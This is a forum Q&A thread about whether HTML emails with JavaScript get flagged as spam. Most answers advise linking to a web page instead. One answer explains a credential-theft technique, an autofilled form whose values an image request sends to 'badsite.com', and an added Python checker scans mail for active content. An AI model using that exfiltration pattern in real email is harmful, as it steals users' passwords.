This is mostly a rhetorical question, as far as I've checked the answer is 'don't even bother', but I wanted to be really sure.

We have an email app, where you can send email to lists of subscribers. This is not spam: it's used, for example, by a university to send communications to its students, by a museum to send emails to subscribers, etc.

Recently, I was asked by a prospective client if it was possible to send HTML messages containing JavaScript without being marked as spam.

Not knowing, I did a short trip of the webs and what I've got is (percentages out of my posterior) 'half the clients won't display properly', 'half the clients will flag you as spam' and 'half the clients will have blocked javascript altogether' (There's clearly some superposition).

So the best solution seems to be adding a link to a proper page if really necessary. Have you got a different experience? Do you know of any email-merge solution that provides this feature? Do you know if specific clients accept it or refuse to display HTML with JavaScript?

+6  A: 

You have listed the right arguments against javascript usage in emails. These show you that it is a bad idea. Linking to a page where you can use javascript freely is a good option and lets the user decide if and when he wants to access this "enhanced" content.

Sebastian Dietz
Exactly, let the user decide, give the subscribers the option of receiving a text-only version or the JavaScript-heavy version.
yx
Agree. The reasons you listed are great, so tell them "no" or "theoretically, yes, but it's the worst idea in the world, here's why...".
jacobangel
A: 

The problem of JavaScript is that it poses a security threat. If there is any email client that accepts it, then it's most likely a security vulnerability and should be fixed.

So, really, "don't even bother", because even if it works, it'll soon stop working.

EDIT: Some people don't seem to understand why it is a security risk, so I'll explain.

Consider the following code (one of the multiple ways to steal passwords using JavaScript and unsafe email clients).

Using JavaScript:

  1. Create a form with "username" and "password" input fields.
  2. Let the browser automatically remember the content of these fields (several users store username and password in the browser's memory to avoid having to type and remember it every time).
  3. Once both fields are (automatically) filled, send their content to your website using something like <img src="badsite.com/senddata?username=user&password=pass">.
  4. Congratulations! You've stolen a password!

Usually, just creating a form using JavaScript in your own unsafe website isn't harmful by itself because the browser is smart enough to tell Gmail data only to Gmail (and you usually don't try to steal passwords from your own website, and in that case there'd be easier ways to steal them anyway).

However, if you allowed JavaScript in emails, then the browser wouldn't be capable of separating legitimate JavaScript from insecure code.

Cookie theft is also possible if an email client can't filter JavaScript.

luiscubal
Not necessarily. It's no vulnerability having Javascript in browsers, why should it be in emails?
Georg
Because JavaScript in emails would be able to get the email cookies for passwords for example and send it to a different site.
luiscubal
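A sender-side check that follows from the answers above, as an added example that is not code from any poster: it scans an outgoing HTML body for the constructs mail clients and filters treat as active content (script tags, forms, event-handler attributes, script-scheme URLs) so a mailing can be corrected before it is sent. The tag and scheme lists, the names `ActiveContentFinder` and `find_active_content`, and the sample message are assumptions made for illustration.

```python
from html.parser import HTMLParser

# Tags that run code or, like the form described in the answer, collect input.
ACTIVE_TAGS = {"script", "form", "iframe", "object", "embed"}
URL_ATTRS = {"href", "src", "action", "formaction"}
SCRIPT_SCHEMES = ("javascript:", "vbscript:", "data:text/html")


class ActiveContentFinder(HTMLParser):
    """Collects (line, kind, detail) findings for active content in HTML mail."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        line = self.getpos()[0]
        if tag in ACTIVE_TAGS:
            self.findings.append((line, "tag", tag))
        for name, value in attrs:
            if name.startswith("on"):
                # onclick, onload, onerror ... run script without a <script> tag
                self.findings.append((line, "event-handler", name))
            elif name in URL_ATTRS and value:
                # Drop whitespace and control characters before comparing schemes
                scheme = "".join(c for c in value if c > " ").lower()
                if scheme.startswith(SCRIPT_SCHEMES):
                    self.findings.append((line, "script-url", name))


def find_active_content(html_body):
    finder = ActiveContentFinder()
    finder.feed(html_body)
    finder.close()
    return finder.findings


# Constructed sample message body, not taken from the page.
SAMPLE = """<html><body>
<a href="https://example.org/exhibit">See the exhibit</a>
<img src="https://example.org/logo.png" onerror="track()">
<a href="Java&#9;Script:void(0)">more</a>
<form action="https://example.org/login"><input name="password"></form>
<script>document.title = "hi";</script>
</body></html>"""

if __name__ == "__main__":
    for line, kind, detail in find_active_content(SAMPLE):
        print(f"line {line}: {kind} ({detail})")
```

An empty result means none of the listed constructs were found; it does not guarantee that a given client or spam filter will accept the message.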
A: 

With spam being such a big deal I would stick to sending out basic emails that are easily consumable. You can always link to a webpage which has your JavaScript in it. You can also send a querystring parameter in the URL to track the users who are most interested in your emails because this will tell you they are clicking into them. So while it may be possible, it's probably best to avoid it.

Bob
A: 

Yeah, it is possible but not recommended. For security purposes, most mail management software blocks JS or gives an alert if a message includes JS. If the user is strict about spam, then these mails also go to spam.

4thpage